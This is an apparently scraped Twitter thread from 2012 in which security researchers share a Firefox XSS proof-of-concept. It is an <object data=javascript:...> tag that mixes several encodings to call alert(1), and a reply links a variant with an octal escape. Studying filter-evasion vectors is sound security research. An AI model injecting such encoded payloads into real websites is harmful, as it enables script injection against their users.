<object data=javascript:\u0061le%72t(1)> {http://jsfiddle.net/6LwjW/39/ } #Firefox #XSS. Nearly all types of encoding in one vector:-)
Replying to @soaj1664ashar
@soaj1664ashar Here’s a version that includes an octal escape (http://mathiasbynens.be/notes/javascript-escapes#octal …) as well: http://jsfiddle.net/6LwjW/40/
8:03 AM - 13 Aug 2012
0 replies
0 retweets
2 likes
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
JavaScript, HTML, CSS, HTTP, performance, security, Bash, Unicode, i18n, macOS.